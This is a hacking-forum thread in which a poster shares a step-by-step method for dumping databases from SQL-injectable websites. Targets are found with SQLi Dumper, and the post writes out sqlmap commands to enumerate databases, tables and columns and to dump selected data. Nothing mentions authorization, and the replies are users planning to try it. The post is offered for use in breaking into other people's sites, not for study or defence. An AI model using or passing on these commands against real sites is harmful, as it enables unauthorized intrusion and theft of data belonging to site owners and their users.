cake

HOW TO DUMP DATABASES 10X FASTER THAN SQLI DUMPER ( ?% WORKING )

Recommended Posts

Hello Guys , I am back with another thread .

Well , as by title , you have already understand what it is going to be today.

 

Well , this is my personal method and I would love to share it here.

 

 

So ? ENJOY ? and DON'T LEECH.

 

[hide]How to dump databases 10x faster than SQLi Dumper

 

 

 

 

Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab.

 

 

 

Step 2: Install sqlmap on your preferred operating system, (this requires python).

 

 

 

Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py")

 

 

 

Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference.

 

 

 

Step 5: Scanning is done! Time to dump!

 

 

 

(List databases): sqlmap -u "URL" --dbs

 

(List tables): sqlmap -u "URL" -D "DATABASE" --tables

 

(List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns

 

(Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta

 

 

 

 

 

 

 

Once it's done dumping it will notify you of the saved location for the database smile.png 

If you need any help, feel free to contact me .[/hide]

  • Like 7

Share this post


Link to post
Share on other sites

curious thanks for sharing

  • Like 8

Share this post


Link to post
Share on other sites

wow thx you!

  • Like 6

Share this post


Link to post
Share on other sites

Sound interesting, ill try bro!!

  • Like 9

Share this post


Link to post
Share on other sites

Looking for this but hope its work. Thank you for sharing.

  • Like 6

Share this post


Link to post
Share on other sites

Hello Guys , I am back with another thread .

Well , as by title , you have already understand what it is going to be today.

 

Well , this is my personal method and I would love to share it here.

 

 

So ? ENJOY ? and DON'T LEECH.

 

[hide]Content is hidden! Please check original post to view it.[/hide][/font][/color]

 

thanks

  • Like 2

Share this post


Link to post
Share on other sites

looks intresting

im gonna try this right away

hope it works

thanks man

  • Like 10

Share this post


Link to post
Share on other sites

This tutorial is from Mr.Royos on youtube right? Btw, Thanks for sharing this in here men

  • Like 7

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.